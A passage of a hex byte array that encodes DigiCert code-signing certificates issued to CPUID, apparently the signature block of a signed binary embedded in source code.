0xDC, 0x67, 0x45, 0x36, 0x32, 0xAF, 0x04, 0x81, 0xBC, 0xA8, 0x00, 0x6E, 0x61, 0x4C, 0x95, 0xC5, 0x5C, 0xD4, 0x8E, 0x8E, 0x9F, 0x2F, 0xC1, 0x32, 0x74, 0xBD, 0xBD, 0x11, 0x65, 0x03, 0x07, 0xCD, 0xEF, 0xB7, 0x5E, 0x02, 0x57, 0xDA, 0x86, 0xD4, 0x1A, 0x28, 0x34, 0xAF, 0x88, 0x49, 0xB2, 0xCF, 0xA5, 0xDD, 0x82, 0x56, 0x6F, 0x68, 0xAA, 0x14, 0xE2, 0x59, 0x54, 0xFE, 0xFF, 0xEA, 0xEE, 0xEF, 0xEA, 0x92, 0x70, 0x22, 0x60, 0x81, 0xE3, 0x25, 0x23, 0xC0, 0x9F, 0xCC, 0x0F, 0x49, 0xB2, 0x35, 0xAA, 0x58, 0xC3, 0x3A, 0xC3, 0xD9, 0x16, 0x94, 0x10, 0x30, 0x82, 0x05, 0x98, 0x30, 0x82, 0x04, 0x80, 0xA0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x10, 0x07, 0xEF, 0x90, 0x2F, 0x30, 0x9D, 0x9D, 0xF9, 0x3E, 0x51, 0x24, 0xFA, 0x3E, 0xE5, 0xDA, 0xE2, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x0B, 0x05, 0x00, 0x30, 0x6C, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x15, 0x30, 0x13, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x0C, 0x44, 0x69, 0x67, 0x69, 0x43, 0x65, 0x72, 0x74, 0x20, 0x49, 0x6E, 0x63, 0x31, 0x19, 0x30, 0x17, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x10, 0x77, 0x77, 0x77, 0x2E, 0x64, 0x69, 0x67, 0x69, 0x63, 0x65, 0x72, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x31, 0x2B, 0x30, 0x29, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x22, 0x44, 0x69, 0x67, 0x69, 0x43, 0x65, 0x72, 0x74, 0x20, 0x45, 0x56, 0x20, 0x43, 0x6F, 0x64, 0x65, 0x20, 0x53, 0x69, 0x67, 0x6E, 0x69, 0x6E, 0x67, 0x20, 0x43, 0x41, 0x20, 0x28, 0x53, 0x48, 0x41, 0x32, 0x29, 0x30, 0x1E, 0x17, 0x0D, 0x31, 0x35, 0x30, 0x39, 0x31, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x5A, 0x17, 0x0D, 0x31, 0x38, 0x30, 0x39, 0x31, 0x39, 0x31, 0x32, 0x30, 0x30, 0x30, 0x30, 0x5A, 0x30, 0x81, 0xBC, 0x31, 0x1D, 0x30, 0x1B, 0x06, 0x03, 0x55, 0x04, 0x0F, 0x0C, 0x14, 0x50, 0x72, 0x69, 0x76, 0x61, 0x74, 0x65, 0x20, 0x4F, 0x72, 0x67, 0x61, 0x6E, 0x69, 0x7A, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x13, 0x30, 0x11, 0x06, 0x0B, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x3C, 0x02, 0x01, 0x03, 0x13, 0x02, 0x46, 0x52, 0x31, 0x14, 0x30, 0x12, 0x06, 0x03, 0x55, 0x04, 0x05, 0x13, 0x0B, 0x34, 0x39, 0x33, 0x20, 0x35, 0x39, 0x30, 0x20, 0x32, 0x30, 0x32, 0x31, 0x1F, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x04, 0x09, 0x13, 0x16, 0x33, 0x39, 0x20, 0x72, 0x75, 0x65, 0x20, 0x4A, 0x6F, 0x73, 0x65, 0x70, 0x68, 0x20, 0x4A, 0x61, 0x63, 0x71, 0x75, 0x61, 0x72, 0x64, 0x31, 0x0E, 0x30, 0x0C, 0x06, 0x03, 0x55, 0x04, 0x11, 0x13, 0x05, 0x35, 0x39, 0x32, 0x34, 0x30, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x46, 0x52, 0x31, 0x12, 0x30, 0x10, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x09, 0x44, 0x75, 0x6E, 0x6B, 0x65, 0x72, 0x71, 0x75, 0x65, 0x31, 0x0E, 0x30, 0x0C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x05, 0x43, 0x50, 0x55, 0x49, 0x44, 0x31, 0x0E, 0x30, 0x0C, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x05, 0x43, 0x50, 0x55, 0x49, 0x44, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01, 0x0F, 0x00, 0x30, 0x82, 0x01, 0x0A, 0x02, 0x82, 0x01, 0x01, 0x00, 0xCB, 0x2B, 0x3E, 0x9E, 0x7F, 0xAF, 0xAD, 0x72, 0xA9, 0x25, 0xBE, 0x33, 0x7F, 0x29, 0xC2, 0x13, 0xBA, 0x47, 0xDA, 0x89, 0x03, 0x3F, 0x1B, 0x05, 0xB4, 0xEC, 0x89, 0xD8, 0x3A, 0xC9, 0x55, 0x71, 0xDE, 0xD3, 0x2C, 0x05, 0x8B, 0x81, 0x54, 0x66, 0x01, 0xB6, 0x44, 0x34, 0x23, 0xF9, 0x1F, 0xC5, 0xA2, 0x1D, 0xE9, 0xEB, 0x8E, 0xBF, 0x29, 0xE4, 0x65, 0x81, 0xA4, 0x2A, 0xD1, 0x46, 0x08, 0x53, 0xE2, 0x4D, 0x3D, 0x8B, 0xE6, 0x94, 0x23, 0x97, 0x5F, 0xD7, 0xF9, 0x4A, 0x07, 0x9F, 0x4B, 0xA7, 0x2A, 0xA0, 0x27, 0xD5, 0xCC, 0x05, 0x70, 0xDD, 0xDA, 0xDF, 0xB5, 0xEA, 0xEF, 0x09, 0x2F, 0xCD, 0xF5, 0x0E, 0x3F, 0xA3, 0xA7, 0x12, 0x71, 0xD3, 0xA6, 0x85, 0x26, 0x4E, 0xD5, 0xA8, 0x4D, 0xDA, 0x59, 0xE3, 0xB7, 0x95, 0xE9, 0xD4, 0xC5, 0x0B, 0x30, 0xDB, 0x8F, 0x09, 0xB6, 0x03, 0xBE, 0x4B, 0xAF, 0x1C, 0xEB, 0x60, 0x49, 0x2B, 0x83, 0xA7, 0x89, 0x16, 0x88, 0xC6, 0x63, 0x9F, 0xBA, 0x88, 0xA8, 0xD8, 0x2E, 0xC2, 0xDF, 0x14, 0x1C, 0xA3, 0x0B, 0xFA, 0x19, 0x98, 0xB4, 0x19, 0x71, 0xEC, 0x0A, 0xAA, 0xF8, 0x9F, 0x76, 0x83, 0x54, 0x50, 0x7C, 0x6D, 0x36, 0x14, 0x28, 0xD2, 0x8D, 0x6C, 0x5D, 0xEB, 0x81, 0x8A, 0x03, 0xA3, 0x29, 0x56, 0x62, 0x7B, 0xC2, 0x4C, 0x77, 0x0F, 0x5B, 0x52, 0x8D, 0xE8, 0x20, 0x72, 0xFA, 0xEB, 0xFF, 0x9B, 0xE4, 0x7A, 0x73, 0x1F, 0x34, 0x77, 0xAD, 0xD0, 0xF3, 0x2F, 0x06, 0x61, 0x1E, 0x7F, 0x85, 0x24, 0x8C, 0x5A, 0x53, 0x1B, 0xF3, 0xAA, 0x95, 0x46, 0xBB, 0x3A, 0x51, 0xDF, 0x52, 0x51, 0x3E, 0x69, 0x84, 0x2A, 0xB0, 0xC0, 0x84, 0x70, 0x3B, 0x8A, 0xA0, 0xEA, 0x55, 0xC4, 0x4B, 0xB9, 0x07, 0x39, 0x1B, 0x16, 0x27, 0x0C, 0x8A, 0x54, 0xFF, 0x9D, 0x02, 0x03, 0x01, 0x00, 0x01, 0xA3, 0x82, 0x01, 0xE3, 0x30, 0x82, 0x01, 0xDF, 0x30, 0x1F, 0x06, 0x03, 0x55, 0x1D, 0x23, 0x04, 0x18, 0x30, 0x16, 0x80, 0x14, 0x8F, 0xE8, 0x7E, 0xF0, 0x6D, 0x32, 0x6A, 0x00, 0x05, 0x23, 0xC7, 0x70, 0x97, 0x6A, 0x3A, 0x90, 0xFF, 0x6B, 0xEA, 0xD4, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x1D, 0x0E, 0x04, 0x16, 0x04, 0x14, 0xFC, 0x7C, 0xA4, 0x49, 0x3B, 0xF0, 0x02, 0x38, 0x42, 0xF0, 0x4D, 0x51, 0x9A, 0xD3, 0x96, 0x33, 0xCB, 0x90, 0xC7, 0xA7, 0x30, 0x29, 0x06, 0x03, 0x55, 0x1D, 0x11, 0x04, 0x22, 0x30, 0x20, 0xA0, 0x1E, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x08, 0x03, 0xA0, 0x12, 0x30, 0x10, 0x0C, 0x0E, 0x46, 0x52, 0x2D, 0x34, 0x39, 0x33, 0x20, 0x35, 0x39, 0x30, 0x20, 0x32, 0x30, 0x32, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x1D, 0x0F, 0x01, 0x01, 0xFF, 0x04, 0x04, 0x03, 0x02, 0x07, 0x80, 0x30, 0x13, 0x06, 0x03, 0x55, 0x1D, 0x25, 0x04, 0x0C, 0x30, 0x0A, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x03, 0x30, 0x7B, 0x06, 0x03, 0x55, 0x1D, 0x1F, 0x04, 0x74, 0x30, 0x72, 0x30, 0x37, 0xA0, 0x35, 0xA0, 0x33, 0x86, 0x31, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x63, 0x72, 0x6C, 0x33, 0x2E, 0x64, 0x69, 0x67, 0x69, 0x63, 0x65, 0x72, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x45, 0x56, 0x43, 0x6F, 0x64, 0x65, 0x53, 0x69, 0x67, 0x6E, 0x69, 0x6E, 0x67, 0x53, 0x48, 0x41, 0x32, 0x2D, 0x67, 0x31, 0x2E, 0x63, 0x72, 0x6C, 0x30, 0x37, 0xA0, 0x35, 0xA0, 0x33, 0x86, 0x31, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x63, 0x72, 0x6C, 0x34, 0x2E, 0x64, 0x69, 0x67, 0x69, 0x63, 0x65, 0x72, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x45, 0x56, 0x43, 0x6F, 0x64, 0x65, 0x53, 0x69, 0x67, 0x6E, 0x69, 0x6E, 0x67, 0x53, 0x48, 0x41, 0x32, 0x2D, 0x67, 0x31, 0x2E, 0x63, 0x72, 0x6C, 0x30, 0x42, 0x06, 0x03, 0x55, 0x1D, 0x20, 0x04, 0x3B, 0x30, 0x39, 0x30, 0x37, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x86, 0xFD, 0x6C, 0x03, 0x02, 0x30, 0x2A, 0x30, 0x28, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x02, 0x01, 0x16, 0x1C, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x64, 0x69, 0x67, 0x69, 0x63, 0x65, 0x72, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x43, 0x50, 0x53, 0x30, 0x7E, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x01, 0x01, 0x04, 0x72, 0x30, 0x70, 0x30, 0x24, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x30, 0x01, 0x86, 0x18, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x6F, 0x63, 0x73, 0x70, 0x2E, 0x64, 0x69, 0x67, 0x69, 0x63, 0x65, 0x72, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x30, 0x48, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x30, 0x02, 0x86, 0x3C, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x63, 0x61, 0x63, 0x65, 0x72, 0x74, 0x73, 0x2E, 0x64, 0x69, 0x67, 0x69, 0x63, 0x65, 0x72, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x44, 0x69, 0x67, 0x69, 0x43, 0x65, 0x72, 0x74, 0x45, 0x56, 0x43, 0x6F, 0x64, 0x65, 0x53, 0x69, 0x67, 0x6E, 0x69, 0x6E, 0x67, 0x43, 0x41, 0x2D, 0x53, 0x48, 0x41, 0x32, 0x2E, 0x63, 0x72, 0x74, 0x30, 0x0C, 0x06, 0x03, 0x55, 0x1D, 0x13, 0x01, 0x01, 0xFF, 0x04, 0x02, 0x30, 0x00, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x0B, 0x05, 0x00, 0x03, 0x82, 0x01, 0x01, 0x00, 0x49, 0x63, 0xC1, 0x59, 0x7F, 0xB6, 0xF1, 0x42, 0xAE, 0x83, 0x55, 0x9D, 0x5A, 0x70, 0xE5, 0xBD, 0x09, 0xF9, 0x2F, 0xDF, 0x2D, 0xDD, 0x16, 0xD9, 0x3C, 0x77, 0xE9, 0x1B, 0x10, 0xC5, 0x2E, 0xF9, 0xE1, 0x03, 0x26, 0x54, 0x51, 0x59, 0x97, 0xDA, 0xFD, 0x19, 0xE3, 0xB0, 0x78, 0xE8, 0xC8, 0x41, 0xEB, 0xDE, 0x62, 0x8E, 0x2F, 0x77, 0xB2, 0x9C, 0x89, 0x8D, 0x06, 0x12, 0xE2, 0xB7, 0xB1, 0xB3, 0xFE, 0xC6, 0xA5, 0xCD, 0x93, 0xD9, 0x58, 0x84, 0x94, 0x01, 0x0E, 0x4E, 0x42, 0xB6, 0x0D, 0x5D, 0x89, 0xD5, 0xEE, 0x4E, 0xE4, 0x03, 0x22, 0x81, 0x55, 0xCD, 0xE7, 0x3C, 0x1B, 0xDB, 0x77, 0x0E, 0x65, 0xA7, 0x26, 0x2A, 0x5C, 0x7C, 0xFA, 0x09, 0x14, 0x83, 0x6D, 0x87, 0x6A, 0x77, 0x69, 0x8E, 0x88, 0xAC, 0x46, 0xB1, 0x62, 0xA6, 0x32, 0x6C, 0x79, 0xE6, 0x2A, 0x85, 0x77, 0x37, 0x57, 0x1B, 0x64, 0xAB, 0x9D, 0x19, 0x55, 0x6E, 0x6C, 0xFB, 0x7F, 0xCC, 0x5B, 0x32, 0xD3, 0x40, 0xEF, 0x38, 0x72, 0xA7, 0xD9, 0x73, 0x65, 0x75, 0x26, 0x5B, 0x78, 0xB7, 0x02, 0x65, 0x2B, 0xD8, 0x62, 0x1B, 0xB9, 0xB6, 0x78, 0xA4, 0x76, 0x8C, 0xBF, 0x78, 0xD6, 0xEB, 0xA0, 0xD1, 0x37, 0x0A, 0xD0, 0xF3, 0xE3, 0xE7, 0xD7, 0xD9, 0x1E, 0x66, 0x66, 0x27, 0xC9, 0xA0, 0xA3, 0x0C, 0x54, 0x8E, 0xD9, 0x7F, 0xB9, 0xAC, 0xA3, 0x58, 0xAA, 0x04, 0x76, 0xBA, 0x2F, 0x1D, 0x47, 0x5E, 0x95, 0x6B, 0xF2, 0x91, 0x23, 0xC5, 0x9D, 0xCE, 0x2C, 0x11, 0x9D, 0x56, 0x60, 0x3C, 0x42, 0x70, 0x6F, 0x0C, 0x88, 0xEF, 0xC1, 0xCD, 0x91, 0x3E, 0x5D, 0xCB, 0xA0, 0x13, 0x08, 0x40, 0xEB, 0x86, 0x96, 0x82, 0x90, 0xCD, 0x55, 0xF9, 0x3B, 0x90, 0x46, 0x6E, 0x87, 0x10, 0xBA, 0xFD, 0x41, 0x11, 0xF6, 0x7F, 0x04, 0xBA, 0x30, 0x82, 0x06, 0xBC, 0x30, 0x82, 0x05, 0xA4, 0xA0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x10, 0x03, 0xF1, 0xB4, 0xE1, 0x5F, 0x3A, 0x82, 0xF1, 0x14, 0x96, 0x78, 0xB3, 0xD7, 0xD8, 0x47, 0x5C, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x0B, 0x05, 0x00, 0x30, 0x6C, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x15, 0x30, 0x13, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x0C, 0x44, 0x69, 0x67, 0x69, 0x43, 0x65, 0x72, 0x74, 0x20, 0x49, 0x6E, 0x63, 0x31, 0x19, 0x30, 0x17, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x10, 0x77, 0x77, 0x77, 0x2E, 0x64, 0x69, 0x67, 0x69, 0x63, 0x65, 0x72, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x31, 0x2B, 0x30, 0x29, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x22, 0x44, 0x69, 0x67, 0x69, 0x43, 0x65, 0x72, 0x74, 0x20, 0x48, 0x69, 0x67, 0x68, 0x20, 0x41, 0x73, 0x73, 0x75, 0x72, 0x61, 0x6E, 0x63, 0x65, 0x20, 0x45, 0x56, 0x20, 0x52, 0x6F, 0x6F, 0x74, 0x20, 0x43, 0x41, 0x30, 0x1E, 0x17, 0x0D, 0x31, 0x32, 0x30, 0x34, 0x31, 0x38, 0x31, 0x32, 0x30, 0x30, 0x30, 0x30, 0x5A, 0x17, 0x0D, 0x32, 0x37, 0x30, 0x34, 0x31, 0x38, 0x31, 0x32, 0x30, 0x30, 0x30, 0x30, 0x5A, 0x30, 0x6C, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x15, 0x30, 0x13, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x0C, 0x44, 0x69, 0x67, 0x69, 0x43, 0x65, 0x72, 0x74, 0x20, 0x49, 0x6E, 0x63, 0x31, 0x19, 0x30, 0x17, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x10, 0x77, 0x77, 0x77, 0x2E, 0x64, 0x69, 0x67, 0x69, 0x63, 0x65, 0x72, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x31, 0x2B, 0x30, 0x29, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x22, 0x44, 0x69, 0x67, 0x69, 0x43, 0x65, 0x72, 0x74, 0x20, 0x45, 0x56, 0x20, 0x43, 0x6F, 0x64, 0x65, 0x20, 0x53, 0x69, 0x67, 0x6E, 0x69, 0x6E, 0x67, 0x20, 0x43, 0x41, 0x20, 0x28, 0x53, 0x48, 0x41, 0x32, 0x29, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01, 0x0F, 0x00, 0x30, 0x82, 0x01, 0x0A, 0x02, 0x82, 0x01, 0x01, 0x00, 0xA7, 0x53, 0xFA, 0x0F, 0xB2, 0xB5, 0x13, 0xF1, 0x64, 0xCF, 0x84, 0x80, 0xFC, 0xAE, 0x80, 0x35, 0xD1, 0xB6, 0xD7, 0xC7, 0xA3, 0x2C, 0xAC, 0x1A, 0x2C, 0xAC, 0xF1, 0x84, 0xAC, 0x3A, 0x35, 0x12, 0x3A, 0x92, 0x91, 0xBA, 0x57, 0xE4, 0xC4, 0xC9, 0xF3, 0x2F, 0xA8, 0x48, 0x3C, 0xB7, 0xD6, 0x6E, 0xDC, 0x97, 0x22, 0xBA, 0x51, 0x79, 0x61, 0xAF, 0x43, 0x2F, 0x0D, 0xB7, 0x9B, 0xB4, 0x49, 0x31, 0xAE, 0x44, 0x58, 0x3E, 0xA4, 0xA1, 0x96, 0xA7, 0x87, 0x4F, 0x23, 0x7E, 0xC3, 0x6C, 0x65, 0x24, 0x90, 0x55, 0x3E, 0xA1, 0xCA, 0x23, 0x7C, 0xC5, 0x42, 0xE9, 0xC4, 0x7A, 0x62, 0x45, 0x9B, 0x7D, 0xDE, 0x63, 0x74, 0xCB, 0x9E, 0x63, 0x25, 0xF8, 0x84, 0x9A, 0x9A, 0xAD, 0x45, 0x4F, 0xAE, 0x7D, 0x1F, 0xC8, 0x13, 0xCB, 0x75, 0x9B, 0xC9, 0xE1, 0xE1, 0x8A, 0xF8, 0x0B, 0x0C, 0x98, 0xF4, 0xCA, 0x3E, 0xD0, 0x45, 0xAA, 0x7A, 0x1E, 0xA5, 0x58, 0x93, 0x36, 0x34, 0xBE, 0x2B, 0x2E, 0x2B, 0x31, 0x58, 0x66, 0xB4, 0x32, 0x10, 0x9F, 0x9D, 0xF0, 0x52, 0xA1, 0xEF, 0xE8, 0x3E, 0xD3, 0x76, 0xF2, 0x40, 0x5A, 0xDC, 0xFA, 0x6A, 0x3D, 0x1B, 0x4B, 0xAD, 0x76, 0xB0, 0x8C, 0x5C, 0xEE, 0x36, 0xBA, 0x83, 0xEA, 0x30, 0xA8, 0x4C, 0xDE, 0xF1, 0x0B, 0x2A, 0x58, 0x41, 0x88, 0xAE, 0x00, 0x89, 0xAB, 0x03, 0xD1, 0x16, 0x82, 0x20, 0x22, 0x76, 0xEB, 0x5E, 0x54, 0x38, 0x12, 0x62, 0xE1, 0xD2, 0x70, 0x24, 0xDB, 0xED, 0x1F, 0x70, 0xD2, 0x64, 0x09, 0x80, 0x2D, 0xE2, 0xB6, 0x9D, 0xCE, 0x1F, 0xF2, 0xBB, 0x21, 0xF3, 0x6C, 0xDB, 0xD8, 0xB3, 0x19, 0x7B, 0x8A, 0x50, 0x9F, 0xEF, 0xEC, 0x36, 0x0A, 0x5C, 0x9A, 0xB7, 0x4A, 0xD3, 0x08, 0xA0, 0x39, 0x79, 0xFD, 0xDD, 0xBF, 0x3D, 0x3A, 0x09, 0x25, 0x02, 0x03, 0x01, 0x00, 0x01, 0xA3, 0x82, 0x03, 0x58, 0x30, 0x82, 0x03, 0x54, 0x30, 0x12, 0x06, 0x03, 0x55, 0x1D, 0x13, 0x01, 0x01, 0xFF, 0x04, 0x08, 0x30, 0x06, 0x01, 0x01, 0xFF, 0x02, 0x01, 0x00, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x1D, 0x0F, 0x01, 0x01, 0xFF, 0x04, 0x04, 0x03, 0x02, 0x01, 0x86, 0x30, 0x13, 0x06, 0x03, 0x55, 0x1D, 0x25, 0x04, 0x0C, 0x30, 0x0A, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x03, 0x30, 0x7F, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x01, 0x01, 0x04, 0x73, 0x30, 0x71, 0x30, 0x24, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x30, 0x01, 0x86, 0x18, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x6F, 0x63, 0x73, 0x70, 0x2E, 0x64, 0x69, 0x67, 0x69, 0x63, 0x65, 0x72, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x30, 0x49, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x30, 0x02, 0x86, 0x3D, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x63, 0x61, 0x63, 0x65, 0x72, 0x74, 0x73, 0x2E, 0x64, 0x69, 0x67, 0x69, 0x63, 0x65, 0x72, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x44, 0x69, 0x67, 0x69, 0x43, 0x65, 0x72, 0x74, 0x48, 0x69, 0x67, 0x68, 0x41, 0x73, 0x73, 0x75, 0x72, 0x61, 0x6E, 0x63, 0x65, 0x45, 0x56, 0x52, 0x6F, 0x6F, 0x74, 0x43, 0x41, 0x2E, 0x63, 0x72, 0x74, 0x30, 0x81, 0x8F, 0x06, 0x03, 0x55, 0x1D, 0x1F, 0x04, 0x81, 0x87, 0x30, 0x81, 0x84, 0x30, 0x40, 0xA0, 0x3E, 0xA0, 0x3C, 0x86, 0x3A, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x63, 0x72, 0x6C, 0x33, 0x2E, 0x64, 0x69, 0x67, 0x69, 0x63, 0x65, 0x72, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x44, 0x69, 0x67, 0x69, 0x43, 0x65, 0x72, 0x74, 0x48, 0x69, 0x67, 0x68, 0x41, 0x73, 0x73, 0x75, 0x72, 0x61, 0x6E, 0x63, 0x65, 0x45, 0x56, 0x52, 0x6F, 0x6F, 0x74, 0x43, 0x41, 0x2E, 0x63, 0x72, 0x6C, 0x30, 0x40, 0xA0, 0x3E, 0xA0, 0x3C, 0x86, 0x3A, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x63, 0x72, 0x6C, 0x34, 0x2E, 0x64, 0x69, 0x67, 0x69, 0x63, 0x65, 0x72, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x44, 0x69, 0x67, 0x69, 0x43, 0x65, 0x72, 0x74, 0x48, 0x69, 0x67, 0x68, 0x41, 0x73, 0x73, 0x75, 0x72, 0x61, 0x6E, 0x63, 0x65, 0x45, 0x56, 0x52, 0x6F, 0x6F, 0x74, 0x43, 0x41, 0x2E, 0x63, 0x72, 0x6C, 0x30, 0x82, 0x01, 0xC4, 0x06, 0x03, 0x55, 0x1D, 0x20, 0x04, 0x82, 0x01, 0xBB, 0x30, 0x82, 0x01, 0xB7, 0x30, 0x82, 0x01, 0xB3, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x86, 0xFD, 0x6C, 0x03, 0x02, 0x30, 0x82, 0x01, 0xA4, 0x30, 0x3A, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x02, 0x01, 0x16, 0x2E, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x64, 0x69, 0x67, 0x69, 0x63, 0x65, 0x72, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x73, 0x73, 0x6C, 0x2D, 0x63, 0x70, 0x73, 0x2D, 0x72, 0x65, 0x70, 0x6F, 0x73, 0x69, 0x74, 0x6F, 0x72, 0x79, 0x2E, 0x68, 0x74, 0x6D, 0x30, 0x82, 0x01, 0x64, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x02, 0x02, 0x30, 0x82, 0x01, 0x56, 0x1E, 0x82, 0x01, 0x52, 0x00, 0x41, 0x00, 0x6E, 0x00, 0x79, 0x00, 0x20, 0x00, 0x75, 0x00, 0x73, 0x00, 0x65, 0x00, 0x20, 0x00, 0x6F, 0x00, 0x66, 0x00, 0x20, 0x00, 0x74, 0x00, 0x68, 0x00, 0x69, 0x00, 0x73, 0x00, 0x20, 0x00, 0x43, 0x00, 0x65, 0x00, 0x72, 0x00, 0x74, 0x00, 0x69, 0x00, 0x66, 0x00, 0x69, 0x00, 0x63, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x20, 0x00, 0x63, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x74, 0x00, 0x69, 0x00, 0x74, 0x00, 0x75, 0x00, 0x74, 0x00, 0x65, 0x00, 0x73, 0x00, 0x20, 0x00, 0x61, 0x00, 0x63, 0x00, 0x63, 0x00, 0x65, 0x00, 0x70, 0x00, 0x74, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x63, 0x00, 0x65, 0x00, 0x20, 0x00, 0x6F, 0x00, 0x66, 0x00, 0x20, 0x00, 0x74, 0x00, 0x68, 0x00, 0x65, 0x00, 0x20, 0x00, 0x44, 0x00, 0x69, 0x00, 0x67, 0x00, 0x69, 0x00, 0x43, 0x00, 0x65, 0x00, 0x72, 0x00, 0x74, 0x00, 0x20, 0x00, 0x43, 0x00, 0x50, 0x00, 0x2F, 0x00, 0x43, 0x00, 0x50, 0x00, 0x53, 0x00, 0x20, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x64, 0x00, 0x20, 0x00, 0x74, 0x00, 0x68, 0x00, 0x65, 0x00, 0x20, 0x00, 0x52, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x79, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x72, 0x00, 0x74, 0x00, 0x79, 0x00, 0x20, 0x00, 0x41, 0x00, 0x67, 0x00, 0x72, 0x00, 0x65, 0x00, 0x65, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x20, 0x00, 0x77, 0x00, 0x68, 0x00, 0x69, 0x00, 0x63, 0x00, 0x68, 0x00, 0x20, 0x00, 0x6C, 0x00, 0x69, 0x00, 0x6D, 0x00, 0x69, 0x00, 0x74, 0x00, 0x20, 0x00, 0x6C, 0x00, 0x69, 0x00, 0x61, 0x00, 